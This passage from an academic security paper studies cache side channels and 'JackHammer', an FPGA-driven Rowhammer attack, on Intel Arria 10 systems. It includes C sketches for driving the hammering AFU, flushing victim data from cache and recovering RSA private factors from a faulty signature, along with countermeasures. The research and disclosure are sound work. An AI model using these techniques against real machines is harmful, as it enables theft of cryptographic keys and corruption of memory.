This section investigates the CPU's capabilities to run cache attacks against the coherent cache on the integrated Arria 10 FPGA. First, we measured the memory access latency depending on the location of the accessed address, using the rdtsc instruction. The results in Figure 5a show that the CPU can clearly distinguish where an accessed address is located. Therefore, the CPU is capable of probing a memory address that may or may not be present in the local FPGA cache. It is interesting to note that requests to main memory return faster than those going to the FPGA cache. This can be explained by the much slower clock speed of the FPGA, which runs at 400 MHz while the CPU operates at 1.2-3.4 GHz. Another explanation is that our test platform is a prototype and the coherency protocol implementation of the blue region is still buggy. As nearly all known cache attack techniques use some form of probing phase, this capability is a good step toward a fully working cache attack from the CPU against the FPGA cache.
Besides the capability of probing the FPGA cache, we also need a way of flushing, priming, or evicting cache lines to put the FPGA cache into a known state. While the AFU can control which data is cached locally by using caching hints, no such option is documented for the CPU. Therefore, we cannot prime the FPGA cache to evict cache lines. However, as the CPU has a clflush instruction, we are capable of flushing cache lines from the FPGA cache, because that cache is coherent with the CPU caches.
In summary, we can probe and flush cache lines located in the FPGA cache. This enables a Flush+Reload attack against a victim AFU, where the addresses used by the AFU are flushed before the AFU executes. After the execution, the attacker probes all previously flushed addresses to learn which ones were used during the AFU's execution.
Another possible cache attack is the more efficient Flush+Flush. We additionally expect this attack to be more precise, as flushing a cache line that is present in the FPGA cache takes about 500 CPU clock cycles longer than flushing one that is not (cf. Figure 5b), while the latency difference between main memory and FPGA cache accesses adds up to only about 50-70 CPU clock cycles.
In general, the applicability of Flush+Reload and Flush+Flush is limited because the attacker and victim must share access to a physical memory location. A reasonable attack scenario that satisfies this requirement would be a case where two users on the same CPU share an instantiation of a library that uses an AFU for acceleration of a process that should remain private, like training a machine learning model with confidential data or performing cryptographic operations.
D. Intra-FPGA Cache Side-Channels
As soon as FPGAs support simultaneous multi-tenancy, that is, the capability to place two AFUs from different users on the same FPGA at the same time, the possibility of intra-FPGA cache attacks arises. As the cache on the integrated Arria 10 is direct-mapped and only 128 KiB in size, finding eviction sets becomes trivial if the attacker AFU is given access to huge pages. As this is the default behavior of the OPAE driver when allocating more than one memory page at once, we assume that it is straightforward to run a successful Prime+Probe attack against a neighboring AFU to, e.g., extract information about a machine learning model.
V. JACKHAMMER ATTACK
a) Contribution: In this section, we present and evaluate a simple AFU design for the Arria 10 GX FPGA that is capable of performing a Rowhammer attack against its host CPU's RAM significantly faster and more effectively than the host CPU itself can. A significant factor in the speed and efficacy of a Rowhammer attack is the rate at which memory can be repeatedly accessed. On many systems, the CPU is sufficiently fast to cause some bit flips, but the FPGA can repeatedly access its host machine's memory system substantially faster than the host machine's CPU can. Ultimately, both the CPU and FPGA share access to the same memory controller hardware, so we attribute the advantage to the drastically simpler architecture of the FPGA's non-user-configurable hardware compared to the microarchitecture of the CPU, and to the resulting lack of software and firmware overhead. Crucially, this also means that it is much more difficult for a program on the CPU to detect an FPGA Rowhammer attack than a CPU Rowhammer attack: the FPGA's memory accesses leave no trace on the CPU itself.
A. JackHammer: Our FPGA Implementation of Rowhammer
We now present our design for JackHammer, a Rowhammer AFU for the Arria 10 FPGA. When the AFU is loaded, the CPU must first use the MMIO interface to set the target physical addresses that the AFU will repeatedly access. In a successful Rowhammer attack, these two addresses should be in the rows adjacent to the row that will incur bit flips. Setting both addresses for a double-sided attack is recommended, but if the second address is set to 0, the AFU performs a single-sided attack using just the first address. The CPU must also use the MMIO interface to set the number of times to access the targeted addresses. The complete control flow, sketched below, is driven entirely over MMIO.
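The host-side control flow might be driven as in the following sketch; the OPAE MMIO calls are real, but the CSR offsets and register semantics are assumptions for illustration, as the AFU's actual register map is not specified here.

```c
#include <stdint.h>
#include <opae/fpga.h>

/* Hypothetical register map; the real AFU defines its own offsets. */
#define CSR_ADDR1 0x0020   /* first target row address                  */
#define CSR_ADDR2 0x0028   /* second target address (0 => single-sided) */
#define CSR_COUNT 0x0030   /* access count; reads back remaining count  */
#define CSR_START 0x0038   /* write 1 to start hammering                */

void jackhammer(fpga_handle accel, uint64_t row_above, uint64_t row_below,
                uint64_t hammers)
{
    fpgaWriteMMIO64(accel, 0, CSR_ADDR1, row_above);
    fpgaWriteMMIO64(accel, 0, CSR_ADDR2, row_below); /* double-sided */
    fpgaWriteMMIO64(accel, 0, CSR_COUNT, hammers);
    fpgaWriteMMIO64(accel, 0, CSR_START, 1);

    /* Poll until the AFU has sent the last read request. */
    uint64_t remaining = 1;
    while (remaining != 0)
        fpgaReadMMIO64(accel, 0, CSR_COUNT, &remaining);
}
```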
Finally, the CPU can write a start signal over the MMIO interface, at which point the AFU begins counting down the number of memory accesses, sending them as fast as it can and alternating between addresses in a double-sided attack. Note that unlike a software implementation of Rowhammer, the accessed addresses do not need to be flushed from cache: DMA requests from the FPGA do not modify the state of the CPU cache, though if the requested memory is in the last-level cache, the request will be served to the FPGA by the cache instead of by memory, and Rowhammer will not work (see subsection III-C for more details on caching behavior). In a real attack scenario, the attacker only needs to ensure that the cache lines containing each of the addresses are never accessed by the CPU during the attack (or, if the attacker must access them from the CPU for some reason, they should be flushed immediately so that the attack is only briefly interrupted). The register holding the number of accesses can be read back to obtain the number of remaining accesses; this is the simplest way to check in software whether the AFU has finished sending them. When the last read request has been sent by the AFU (which is not the same as when the request has been transmitted from the FPGA to the CPU, when it is processed by the RAM, or when the response returns to the FPGA), the number of accesses remaining is zero, and the total amount of time taken to send all of the requests is recorded. (The time to send all the requests is not precisely the time to complete them, but it is very close for sufficiently high numbers of requests. The FPGA has a transaction buffer that holds up to 64 transactions after they have been sent by the AFU. The buffer does take some time to clear, but Rowhammer is rather ineffective unless at least millions of requests are sent in total, so this additional time is negligible for the performance measurements we recorded.)

B. JackHammer on the FPGA PAC vs. CPU Rowhammer

Figure 6 shows a box plot of the 0th, 25th, 50th, 75th, and 100th percentiles of measured "hammering rates" for the Arria 10 FPGA PAC and its host i7-3770 CPU. Each measurement in these distributions is the average hammering rate over a run of 2 billion memory requests. Our JackHammer implementation is substantially faster than the standard CPU Rowhammer, and its speed is far more consistent. The FPGA manages an average throughput of one memory request, or "hammer," every ten FPGA clock cycles at 200 MHz (finishing 2 billion hammers in an average of 103.25 seconds); the CPU averages one hammer every 311 CPU clock cycles at 3.4 GHz (finishing 2 billion hammers in an average of 183.41 seconds). This shows that even if the FPGA were clocked higher, it would still spend most of its time waiting for entries in the PCIe transaction buffer in the non-reconfigurable region to become available. Figure 7 shows measured bit flip rates in the victim row for the same experiment.
Runs where zero flips occurred during hardware or software hammering were excluded from the flip rate distributions, as they are assumed to correspond to sets of rows that are in the same logical bank but not directly adjacent to each other. The increased hammering speed of the FPGA Rowhammer implementation produces a more than proportional increase in flip rate, which is unsurprising given the highly physical nature of the Rowhammer exploit. As the Rowhammer attack is underway, electrical charge drains from the capacitors in the victim row. However, the memory controller also periodically refreshes the charge in the capacitors. When there are more memory accesses to adjacent rows within each refresh window, there is a higher likelihood that any one bit will be misread on the next refresh and therefore reset to a faulty value. This is why the FPGA's increased memory throughput makes for a significantly more effective Rowhammer attack against the same DRAM chip.
Another way to look at hammering performance is by counting the total number of flips produced by a given number of hammers. Figure 8 and Figure 9 show the minimum, maximum, and every 10th percentile of the number of flips produced by the AFU and CPU, respectively, for total hammer counts ranging from 200 million to 2 billion.
These graphs demonstrate how much more effectively the FPGA PAC generates bit flips in the RAM even after the same number of memory accesses. For hammering attempts that resulted in a non-zero number of bit flips, the AFU exhibits a wide distribution of flip counts in the range of 200 million to 800 million hammers, which then rapidly narrows in the range of 800 million to 1.2 billion and finally levels out by 1.8 billion hammers. This set of distributions seems to indicate that "flippable" rows ultimately reach about 80-120 total flips after enough hammering, but it can take anywhere from 200 million hammers (about 10 seconds) to 2 billion hammers (about 100 seconds) to reach that limit. There are also a few rows that incur only a few flips. These samples appear in a consistent pattern demonstrated in Figure 10, which plots a portion of the data used to create Figure 8 in detail. Each impulse in this plot represents the number of flips after a single run of 2 billion hammers on a particular target row. In Figure 10, at indices 23 and 36, two of these outliers are visible, each appearing two indices after several samples in the standard 80-120 flip range. These outliers could indicate rows that are slightly affected by hammering on rows that are nearby but not adjacent.
C. JackHammer on the Integrated Arria 10 vs. CPU Rowhammer
The JackHammer AFU we designed for the integrated platform is the same as the AFU for the PAC, except that the integrated platform has access to more physical channels for the memory reads. The PAC has only a single PCIe channel; the integrated platform has one UPI channel and two PCIe channels, as well as an "automatic" setting which lets the interface manager select a physical channel automatically. We therefore present the hammering rates on this platform with two different settings: alternating PCIe lanes on each access, and the automatic setting. However, this platform is only available to us on Intel's servers, so we have only been able to test one RAM setup and have been unable to get this RAM to flip. (There are several reasons why this could be the case. Some RAM is simply more resistant to flipping by its physical nature. DDR4 memory, which this system uses, sometimes has hardware features to block Rowhammer-style attacks [4]; though some methods have been developed to circumvent these protections [19], they still ultimately rely on the attacker's ability to access the DRAM very many times very quickly, so we consider them outside the scope of this research, which is focused on the relative ability of the FPGA platforms to quickly access DRAM.) The integrated Arria 10 platform shares its package with a modified Xeon v4-style CPU and, on the servers available to us, is installed on an X99 series motherboard with 64 GB of DDR4 RAM. Figure 11 shows distributions of measured hammering rates on the integrated Arria 10 platform. Compared to the Arria 10 PAC, the integrated Arria 10's hammering rate is more varied, but with a similar mean rate.
1) The Effect of Caching on Rowhammer Performance: A primary reason for the difference in hammering performance between JackHammer on the FPGAs and a typical Rowhammer implementation on the CPUs is that when one of the FPGAs reads a line of memory from RAM, the line is not cached, so the next read misses the cache and is directed to the RAM as well. On the other hand, when the CPU accesses a line of memory, it is cached, and the memory line must be flushed from cache before the next read is issued; otherwise the next read will hit the cache instead of RAM, and the physical row in the RAM will not be "hammered."
To show that caching is the primary factor in the performance disparity we observed between FPGA-based and CPU-based Rowhammer, we used the PTEditor [53] kernel module to mark allocated pages as uncachable before testing hammering performance. We edited the setup of the Rowhammer performance tests to allocate many 4 kB pages and mark all of them as uncachable, instead of one 2 MB huge page, because the kernel module we used was not correctly configuring huge pages as uncachable. However, it is still easy to find a large contiguous range of physical addresses: when these pages are allocated by OPAE, the physical address is directly available to the software. The software simply allocates thousands of 4 kB pages, sorts them, finds the biggest contiguous range among them, and attempts to find colliding row addresses within that range. The JackHammer AFU required no modifications; the assembly code used to hammer from the CPU was edited to not flush the memory after reading it.
We were unable to compile the PTEditor kernel module needed to set the memory as uncachable on the i7-3770 system, so the FPGA PAC was moved to a Dell PowerEdge R720 system with a Xeon E5-2670 v2 CPU fixed to a clock speed of 2500 MHz and two 4 GB DIMMs of DDR3 DRAM clocked at 1600 MHz. Figure 12 shows the performance of the FPGA PAC and this system's CPU with caching enabled and disabled. Disabling caching produces a significant speedup in hammering for both the PAC and the CPU, but especially for the CPU, which saw a 188% performance increase. With caching enabled, the median hammering rate of the PAC was more than twice that of the CPU, but with caching disabled, the median hammering rate of the PAC was only 22% faster than that of the CPU. Of course, memory accesses on modern systems are extremely complex (even with caching disabled), so there are likely factors affecting the changes in hammering rate that we cannot account for, but removing the need for the CPU to flush the memory it is hammering brought its performance much closer to that of the PAC, as we hypothesized.
VI. FAULT ATTACK ON RSA USING JACKHAMMER
In this section, we demonstrate the practical possibility of a fault injection Rowhammer attack from an Arria 10 platform against the WolfCrypt RSA implementation running on its host CPU. Many Rowhammer-based attacks leverage fault injections to exploit cryptographic schemes [7, 8] or gain root privileges [19, 57, 54]. In the RSA fault injection attack first proposed in [9], an intermediate value in the Chinese remainder theorem modular exponentiation algorithm is faulted, causing an invalid signature to be produced. We attack the WolfCrypt RSA implementation in the style of [9] with both the Arria 10 FPGA and its host CPU, and find that the attack is impractically slow on the CPU and all but unable to cause a fault in a reasonable time window, but the increased hammering speed and flip rate of the Arria 10 FPGA makes the attack possible in the time frame of about 9 RSA signatures. Figure 13 shows the high-level operation of our attack: the WolfCrypt RSA application runs on one core, while a malicious application runs adjacent to it, assisting the Rowhammer AFU on the FPGA in setting up the attack. The Rowhammer AFU causes a hardware fault in the main memory, and when the WolfCrypt application reads the faulty memory, it produces a faulty signature that leaks the private factors used in the RSA scheme.
A. RSA Fault Injection Attacks
In general, a fault injection attack is an attack where a hardware fault is intentionally induced in such a way that security of some sort is compromised. In this section, we implement a fault injection attack against the Chinese remainder theorem implementation of the RSA algorithm, commonly known as the Bellcore attack [9]. Algorithm 1 shows a normally functioning Chinese remainder theorem (CRT) RSA signing scheme, where the signature S is computed by raising a message m to the private exponent d, modulo N. d_p and d_q are precomputed as d mod (p − 1) and d mod (q − 1), where p and q are the prime factors of N [5]. When one of the intermediates S_q or S_p is computed incorrectly, an interesting case arises. Consider the difference between a correctly computed signature S and an incorrectly computed signature S′, computed with an invalid intermediate S′_p. The difference S − S′ contains a factor of q (times the difference of the intermediates), so the GCD of S − S′ and N is the factor q, and the other factor follows as p = N/q. This reduces the problem of factoring N into p and q by brute force to a simple subtraction and a GCD operation, so the private factors (p, q) are effectively leaked once the attacker has just one valid signature S and one faulty signature S′. The same factor can be recovered with just the one faulty signature if the message m and public key e are known; it is also equal to the GCD of S′^e − m and N.
a) Fault Injection Attack with RSA Base Blinding: A common modification to any RSA scheme is the addition of base blinding, which is effective against simple and differential power analysis side-channel attacks but vulnerable to the correlation power analysis attack demonstrated in [59]. Base blinding is used by default in the WolfCrypt RSA-CRT signature scheme that we attack. In this blinding process, shown in Algorithm 2, the hash of the message is multiplied by a randomly generated number before it is encrypted with the private key. The resulting signature must then be multiplied by the inverse of the random number to yield a valid signature, as shown in Algorithm 3.
This blinding scheme does not prevent the Bellcore fault injection attack from working. Consider a valid signature blinded with random factor r_1 and a faulty signature blinded with r_2. Because the fault affects only the mod-p intermediate, both signatures are still correct modulo q after unblinding: the blinded intermediates are unblinded and cancel as before, as shown in Equation 1.

S − S′ ≡ m^d − m^d ≡ 0 (mod q)    (1)

So ultimately, there is still a factor of q in the difference S − S′, which can be extracted with a GCD as before.
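The recovery step itself reduces to a subtraction and a GCD; the following GMP sketch (our illustration, not WolfCrypt code) recovers both factors from one correct and one faulty signature.

```c
#include <gmp.h>

/*
 * Bellcore factor recovery (sketch using GMP): given a correct
 * signature S and a faulty signature Sf whose mod-p half was faulted,
 * gcd(S - Sf, N) yields q; p follows as N / q.
 */
int recover_factors(mpz_t p, mpz_t q,
                    const mpz_t S, const mpz_t Sf, const mpz_t N)
{
    mpz_t diff;
    mpz_init(diff);
    mpz_sub(diff, S, Sf);
    mpz_gcd(q, diff, N);              /* q divides S - Sf, p does not */
    mpz_clear(diff);
    if (mpz_cmp_ui(q, 1) == 0 || mpz_cmp(q, N) == 0)
        return -1;                    /* fault did not isolate a factor */
    mpz_divexact(p, N, q);
    return 0;
}
```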
Algorithm 2 RSA Blinding Used in WolfCrypt
1: procedure BLIND(m, e, n) ▷ m: the (hashed) message; (e, n): the public key
2: r ← random integer in Z_n ▷ the random blinding factor
3: r_i ← r^{-1} mod n ▷ the inverse of r, r_i, will be used for unblinding
4: m_b ← m · r^e mod n
5: return m_b ▷ m_b is the "blinded" version of the message which is encrypted to create a signature
6: end procedure

Algorithm 3 RSA Deblinding Used in WolfCrypt
1: procedure DEBLIND(s_b, r_i) ▷ s_b: the blinded signature, equal to (m · r^e)^d mod n = m^d · r mod n; r_i: the inverse of the random blinding factor, computed in Algorithm 2
2: s ← s_b · r_i mod n ▷ s_b · r_i mod n = m^d · r · r^{-1} mod n
3: return s ▷ s is the regular, unblinded signature
4: end procedure

B. Our Attack

a) Approach and Justification: We developed a simplified attack model to test the effectiveness of the Arria 10 Rowhammer in a fault injection scenario. Our model simplifies the setup of the attack so that we can efficiently measure the performance of both a CPU Rowhammer attack and our JackHammer implementation. We sign the same message with the same key repeatedly while the Rowhammer exploit runs, and count the number of correct signatures until a faulty signature is generated, leaking the key used for signing.

b) Our Attack Setup: In summary, our simplified attack model works as follows: one program runs the "victim" and the "attacker," as well as controlling the JackHammer AFU. It first allocates a large block of memory and checks it for conflicting row addresses. It then quickly tests which of those rows can be faulted with hammering: each row is hammered with 1,000,000 memory accesses 10 times, and the total number of bit flips across the 10 runs is added up within each of the sixty-four 1024-bit chunks of the row, each of which is a possible target for the attack.

One of the typical complications of a Rowhammer fault injection attack is ensuring that the victim's data is located in a row that can be hammered. In our simplified model, we choose the location of the victim data manually, by row number within the set of contiguous rows and by offset within the row, so that we may easily test the effectiveness of the attack at various rows and various locations. In a real attack, the location of the victim program's memory can be controlled by the attacker with a technique known as page spraying [54], which is simply allocating a large number of pages and then deallocating a select few, filling the memory in an attempt to cause the victim program to allocate the right pages. Improvements to this process are possible; for example, [7] demonstrated how cache timing side channels can be used to gather information about the physical addresses of data being used by the victim process.

After our simplified model selects a target row, it instructs the Rowhammer AFU to begin hammering the adjacent rows. Then, in the "victim" program, the targeted data (the precomputed intermediate value d mod q − 1) is copied to the target address selected by the "attacker." The "victim" then enters a loop where it reads back the data from the target row and uses it as part of an RSA key to create a signature over a sample message. However, when the memory is read back from the target address, the attack cannot work if the target address's data is still cached, because the value will be read from the non-faulty cache instead of from DRAM, where any faults occur. In a real attack, the attacker typically uses an eviction set to evict the targeted memory from the cache. For more discussion of eviction sets in the context of this paper, see section IV. In our simplified model, we simply open a new thread which directly flushes the targeted cache lines on a given time interval. As we show below, the performance of the attack depends significantly on the time interval between flushes.
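A minimal sketch of such a flushing thread follows; the global names, the interval parameter, and the assumption that the harness spawns it with pthread_create are ours, as the paper does not list its exact code. The thread repeatedly issues clflush over the cache lines covering the target data so that the victim's next read is served from (possibly faulted) DRAM:

#include <stdatomic.h>
#include <stddef.h>
#include <unistd.h>
#include <emmintrin.h>   /* _mm_clflush, _mm_mfence */

/* Hypothetical globals: location and size of the victim's key material,
   and the eviction interval in microseconds. */
static void *target_addr;
static size_t target_len;
static useconds_t interval_us;   /* e.g. 64000 for a 64 ms interval */
static atomic_bool stop_flushing;

/* Runs in a separate thread spawned by the attack harness. */
static void *flush_thread(void *arg) {
    (void)arg;
    while (!atomic_load(&stop_flushing)) {
        for (size_t off = 0; off < target_len; off += 64)   /* 64 B lines */
            _mm_clflush((char *)target_addr + off);
        _mm_mfence();            /* complete the flushes before sleeping */
        usleep(interval_us);     /* the eviction interval under study */
    }
    return NULL;
}

Each pass through the loop forces the next signature computation to reload the exponent from DRAM, which is why the interval between flushes effectively simulates the DRAM row refresh interval in the measurements that follow.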
C. Performance of the Attack
In this section, we show that our JackHammer implementation with optimal settings can cause a faulty signature an average of 17% faster than a typical CPU-based, software-driven Rowhammer implementation with optimal settings. In some scenarios, the performance is as much as 4.8 times that of the software implementation. However, under some conditions, the software implementation can be more likely to cause a fault over a longer period of time.
The performance of this fault injection attack is highly dependent on the time interval between evictions, and as such we present all of our results in this section as functions of the eviction interval. Each eviction triggers a subsequent reload from memory when the key is read for the next signature, which refreshes the capacitors in the DRAM. Whenever DRAM capacitors are refreshed, any accumulated voltage error in each capacitor (due to Rowhammer or any other physical effect) is either solidified as a new faulty bit value or reset to a safe and correct value. Too short an interval between evictions causes the DRAM capacitors to be refreshed too quickly to be flipped with high probability. On the other hand, longer intervals can mean the attack waits to evict the memory long after a bit flip has already occurred. It is also crucial to note that DRAM capacitors are automatically refreshed by the memory controller on a 64 ms interval [20]. On some systems, this interval is configurable: faster refresh rates reduce the rate of memory errors, including those induced by Rowhammer, but they can impede maximum performance because the memory spends more time doing maintenance refreshes rather than serving read and write requests. For more discussion on modifying row refresh rates, see section VII.

In Table III we present two metrics with which we compare JackHammer and a standard CPU Rowhammer implementation. This table shows the mean number of signatures until a faulty signature is produced, and the ultimate probability of success of an attack within 1000 signatures, against a random key in a randomly selected chunk of memory within a row known to be vulnerable to Rowhammer. Figure 14 highlights the mean number of signatures until a faulty signature for the 16 ms to 96 ms range of eviction intervals. With an eviction interval of 96 ms, the JackHammer attack achieves the lowest average number of signatures before a fault, at only 58, 25% faster than the best performance of the CPU Rowhammer attack. The CPU attack is impeded significantly by shorter eviction intervals, while the JackHammer implementation is not, indicating that on systems where the DRAM row refresh rate has been increased to protect against memory faults and Rowhammer attacks, JackHammer likely offers substantially improved attack performance.
VII. COUNTERMEASURES
a) Detection Using Hardware Monitoring: Microarchitectural side-channel attacks against CPUs leave traces in hardware performance counters (HPCs), such as cache hit and miss counters. Previous works have paired these HPCs with advanced machine learning techniques to implement real-time detectors for microarchitectural attacks [10, 13, 64, 23]. Gülmezoglu et al.'s FortuneTeller [23] showed that an unsupervised machine learning model can reliably detect many types of side-channel attacks, including several cache attacks and Rowhammer. While such performance counters do not exist in the same form on the Arria 10 GX platforms, they could be implemented by the FIM: the FIM can monitor memory accesses and mark each as a cache hit or miss, and the CPU's performance counters can be used in some scenarios. We therefore expect that a well-designed detection system could thwart many side-channel attacks on the FPGA-CPU interface.
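On the CPU side, such a detector can be fed from standard Linux performance counters. The following sketch counts last-level cache read misses, the signal that cache attacks and Rowhammer inflate; the monitoring scope (the calling process) and the alert threshold are arbitrary placeholders of ours, and a real detector like FortuneTeller [23] uses trained models over several counters rather than a fixed cutoff:

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <linux/perf_event.h>

/* Open a hardware counter for LLC read misses on the given process. */
static int open_llc_miss_counter(pid_t pid) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_HW_CACHE;
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_HW_CACHE_LL
                | (PERF_COUNT_HW_CACHE_OP_READ << 8)
                | (PERF_COUNT_HW_CACHE_RESULT_MISS << 16);
    return (int)syscall(SYS_perf_event_open, &attr, pid, -1, -1, 0);
}

int main(void) {
    int fd = open_llc_miss_counter(0);   /* 0 = the calling process */
    if (fd < 0) { perror("perf_event_open"); return 1; }
    for (;;) {
        ioctl(fd, PERF_EVENT_IOC_RESET, 0);
        sleep(1);
        uint64_t misses = 0;
        if (read(fd, &misses, sizeof misses) != (ssize_t)sizeof misses)
            break;
        /* Placeholder threshold: flag sustained LLC miss storms. */
        if (misses > 1000000)
            fprintf(stderr, "anomalous LLC miss rate: %llu/s\n",
                    (unsigned long long)misses);
    }
    return 0;
}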
b) Cache Partitioning and Pinning: Many cache partitioning mechanisms have been proposed to protect CPUs against cache attacks. Some are implementable in software [35, 63, 67, 36], while others require hardware support [41, 17, 18]. For protecting FPGA caches against cache attacks, the hardware-based approaches are especially relevant. For example, the FIM could partition the cache into several parts, such that each AFU can only use a subset of the cache lines in the local cache. Another approach would introduce an additional flag to the CCI-P interface telling the local caching agent which cache lines to pin to the cache.

c) Increasing DRAM Row Refresh Rate: A standard defense against Rowhammer attacks is increasing the rate at which DRAM is refreshed. DDR3 and DDR4 specifications require that each row is refreshed at least every 64 ms, but many systems can be configured to refresh each row every 32 or 16 ms for better memory stability. When we measured the performance of our fault injection attack in section VI, we varied the interval between evictions of the targeted data, simulating equivalent intervals in row refresh rate, since each eviction causes a subsequent row refresh when the memory is read by the victim program. Table III shows that under 1% of attempted Rowhammer attacks from both CPU and FPGA were successful with an eviction interval of 32 ms, compared to 14% of CPU attacks and 26% of FPGA attacks with an interval of 64 ms, suggesting that increasing the row refresh rate would significantly impede even the more powerful FPGA Rowhammer attack. A thorough attack could likely still find some vulnerable memory locations on this system, but this defense could give a victim valuable time to detect an attack before a fault occurs.

d) Disabling Hugepages and Virtualizing AFU Address Space: Intel is aware that making physical addresses available to userspace through OPAE is a bad idea, as a note in the documentation [29] of the fpgaGetIOAddress function shows. In addition to exposing physical addresses, OPAE makes heavy use of hugepages to ensure the physical address continuity of buffers shared with the AFU. However, it is well known that disabling hugepages raises the barrier to finding eviction sets [32, 42], which in turn makes cache attacks more difficult. We suggest disabling OPAE's usage of hugepages. To do so, the AFU address space has to be virtualized, regardless of whether the AFU is attached to a virtual machine or to the host itself.

e) Protection against the Bellcore Fault Attack: Defenses against fault injection attacks proposed in the original Bellcore whitepaper [9] include verifying the signature before releasing it (simple, but costly in performance) and random padding of the message before signing, which ensures that no unique message is ever signed twice and that the exact plaintext of a faulty signature cannot be determined. OpenSSL, for example, uses padding, but it is PKCS #1 padding, which is deterministic and therefore useless against the Bellcore attack. Instead, OpenSSL protects against the Bellcore attack by verifying the signature against its plaintext with the public key, and recomputing the exponentiation with a slower but safer single exponentiation, instead of the CRT, if the verification fails [12]. This is safe against the traditional Bellcore fault attack, but [12] demonstrated two other fault injection attacks against the RSA-CRT scheme that are not prevented by this error checking method.
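The verify-before-release defense is straightforward to express in code. The sketch below is our own toy illustration, reusing the toy parameters and helper style from the earlier listing; it is not WolfSSL's or OpenSSL's actual code. It checks the CRT result with the public exponent and falls back to a slow single exponentiation on mismatch, mirroring the OpenSSL strategy described above:

#include <stdio.h>
#include <stdint.h>

static uint64_t modpow(uint64_t b, uint64_t e, uint64_t m) {
    uint64_t r = 1;
    for (b %= m; e; e >>= 1) {
        if (e & 1) r = r * b % m;
        b = b * b % m;
    }
    return r;
}

/* Toy CRT signing with an optional injected fault in Sp. */
static uint64_t sign_crt(uint64_t m, uint64_t d, uint64_t p, uint64_t q,
                         int inject_fault) {
    uint64_t dp = d % (p - 1), dq = d % (q - 1);
    uint64_t qinv = modpow(q, p - 2, p);   /* q^-1 mod p, p prime */
    uint64_t Sp = modpow(m, dp, p) ^ (inject_fault ? 1 : 0);
    uint64_t Sq = modpow(m, dq, q);
    return Sq + q * (qinv * ((Sp + p - Sq % p) % p) % p);
}

/* Verify-before-release: check the CRT result with the public exponent
   and fall back to a slow single exponentiation if the check fails, so a
   faulty CRT signature is never released to the attacker. */
static uint64_t sign_checked(uint64_t m, uint64_t d, uint64_t e,
                             uint64_t p, uint64_t q, int inject_fault) {
    uint64_t n = p * q;
    uint64_t s = sign_crt(m, d, p, q, inject_fault);
    if (modpow(s, e, n) != m)
        s = modpow(m, d, n);   /* safe path: no CRT intermediates to fault */
    return s;
}

int main(void) {
    const uint64_t p = 101, q = 113, e = 3533, d = 6597, m = 42;
    printf("no fault:   s = %llu\n",
           (unsigned long long)sign_checked(m, d, e, p, q, 0));
    printf("with fault: s = %llu (identical; fault swallowed)\n",
           (unsigned long long)sign_checked(m, d, e, p, q, 1));
    return 0;
}

As the text notes, this check stops the classic Bellcore fault but not all RSA-CRT fault attacks [12].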
After we reported the vulnerability discovered in this paper, WolfSSL version 4.3.0 was updated to include a signature verification step that protects against Bellcore-style fault injection attacks.
VIII. CONCLUSION
In this work, we show that modern FPGA-CPU hybrid systems can be more vulnerable to well-known hardware attacks that are traditionally seen on CPU-only systems. We show that the shared cache system of the Arria 10 GX and its host CPU presents possible CPU-to-FPGA, FPGA-to-CPU, and FPGA-to-FPGA attack vectors. For Rowhammer, we show that the Arria 10 GX is capable of causing more DRAM faults in less time than modern CPUs. Our research indicates that defense against hardware side-channels is just as essential for modern FPGA systems as it is for modern CPUs. Of course, the security of any device physically installed in a system, like a network card or graphics card, is important, but FPGAs present additional security challenges due to their inherently flexible nature. From a security perspective, a user-configurable FPGA on a cloud system needs to be treated with at least as much care and caution as a user-controlled CPU thread, as it can exploit many of the same vulnerabilities.
